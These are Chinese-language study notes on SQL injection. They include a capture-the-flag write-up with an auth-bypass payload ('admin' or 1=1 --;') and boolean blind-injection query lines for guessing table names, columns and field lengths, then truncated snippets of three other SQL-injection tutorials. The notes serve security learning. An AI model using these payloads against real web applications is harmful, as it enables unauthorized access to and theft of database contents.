2018-02-03
grant 授權語句
revoke 取消許可權
get 方式url的後面可以跟上?+query語句
post方式可以上傳檔案或表單
cookie 需要關注的注入點
構造語句
admin' or 1=1 --;
回顯 使用union聯合語句 正常可執行/ 不正常會報錯
不回顯的叫盲注
whale ctf
sql注入題wp
表單通過get方式傳輸
輸入1後 url?id=1
單引號是分割資料與命令的 成對出現
基本注入
1.爆破表名
?id =1 and exists(select * from flag) //猜測表名
?id =1 and exists(select * from news)
2.爆破字段
?id =1 and exists(select user from flag)
?id =1 and exists(select password from flag)
?id =1 and exists(select flag from flag)
3.已知表名、字段,判斷字段長度 大於、小於符號嘗試
?id =1 and (select length(flag) from flag)>5
?id =1 and (select length(flag) from flag)>10
?id =1 and (select length(flag) from flag)<10
4.猜解字段的ascii
SQL注入學習
通常情況下,可能存在 sql 注入漏洞的 url 是類似這種形式 對 sql 注入的判斷,主要有兩個方面 可能存在 sql 注入攻擊的 asp php jsp 動態網頁中,乙個動態網頁中可能只有乙個引數,有時可能有多個引數。有時是整型引數,有時是字串型引數,不能一概而論。總之只要是帶有引數的 動態網...
關於SQL注入學習
知道sql injection 但是平時懶的去做這方面的東西,以後一定還得注意 net的專案看來要用儲存過程和分層方式來寫了 sql injection 講解 方法 網上蒐集 1.帶引數的的儲存過程來完成使用者驗證的過程 2.使用者通過 提交過來的變數引數進行檢查的 發現客戶端提交的引數中有 exe...
SQL注入學習 檢測
例項1的鏈結為 注 每個人機器上的可能不太一樣 從url中可以看出,引數為字串 root 從表中返回一行資料,如下圖所示。為了理解伺服器端 我們需要對其進行探測。1.新增多餘字元。比如 1234 使用?name root1234,表中未顯示任何記錄。從這裡我們可以猜測,請求以某種匹配方式來使用我們的...